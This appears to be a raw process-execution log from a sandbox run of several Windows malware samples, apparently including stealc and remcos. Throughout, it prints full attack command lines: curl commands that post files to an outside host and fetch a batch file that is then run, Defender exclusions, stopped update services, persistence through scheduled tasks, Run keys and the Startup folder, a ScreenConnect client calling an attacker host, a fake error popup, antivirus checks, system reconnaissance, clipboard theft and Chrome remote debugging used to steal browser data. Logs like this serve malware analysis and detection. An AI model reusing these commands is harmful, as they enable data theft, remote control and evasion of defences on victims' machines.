C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ufw.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe"
C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe
"C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"
C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\Files\out.exe
"C:\Users\Admin\AppData\Local\Temp\Files\out.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding CF5831D0E8518FC77F67C9B3859A1125
C:\Users\Admin\AppData\Local\Temp\Files\c3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\c3.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 82EBABD0359BB19B907B788469303A45 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh"
C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe" "RunRole" "cce1306d-e7ab-4219-bf52-82c99d2b1aa6" "User"
C:\Users\Admin\AppData\Local\Temp\Files\key.exe
"C:\Users\Admin\AppData\Local\Temp\Files\key.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1468 -ip 1468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1468 -s 360
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe" & rd /s /q "C:\ProgramData\U3E3EC2VAAAI" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe
"C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"
C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "PPTBMYWF"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "PPTBMYWF" binpath= "C:\ProgramData\wxiftyzsteng\qpgcxlhnvaqc.exe" start= "auto"
C:\Windows\System32\Wbem\wmic.exe
wmic nic where NetEnabled='true' get MACAddress,Name
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ellaam.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe
"C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe"
C:\Users\Admin\AppData\Local\Temp\Files\t.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t.exe"
C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe
"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"
C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe
"C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5644 -ip 5644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 440
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5976 -ip 5976
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 224
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe
"C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\Files\m.exe
"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"
C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe
"C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Dk Dk.cmd & Dk.cmd & exit
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 217412
C:\Windows\SysWOW64\findstr.exe
findstr /V "PlasmaProfessionalConstitutesGuide" Cheaper
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Mailing + Violin + Ethernet + Operated + Lunch + Useful 217412\N
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
Possibly.pif N
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\build11.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build11.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_4828_133785306684546397\stub.exe
C:\Users\Admin\AppData\Local\Temp\Files\build11.exe
C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stealc_default2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM "taskmgr.exe""
C:\Windows\system32\taskkill.exe
taskkill /F /IM "taskmgr.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /query /TN "MonsterUpdateService""
C:\Windows\system32\schtasks.exe
schtasks /query /TN "MonsterUpdateService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "MonsterUpdateService" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc hourly /mo 1 /rl highest /tn "MonsterUpdateService2" /tr "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f"
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Monster Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe
"C:\Users\Admin\AppData\Local\Temp\Files\GREENpackage.exe"
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Users\Admin\AppData\Local\Temp\Files\file.exe
"C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\ProgramData\tst\remcos.exe
"C:\ProgramData\tst\remcos.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get UUID
C:\Users\Admin\AppData\Local\Temp\Files\main.exe
"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"
C:\Users\Admin\AppData\Local\Temp\Files\main.exe
"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"
C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffd2eebcc40,0x7ffd2eebcc4c,0x7ffd2eebcc58
C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe
"C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe"
C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe
"C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1840,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1836 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1896,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
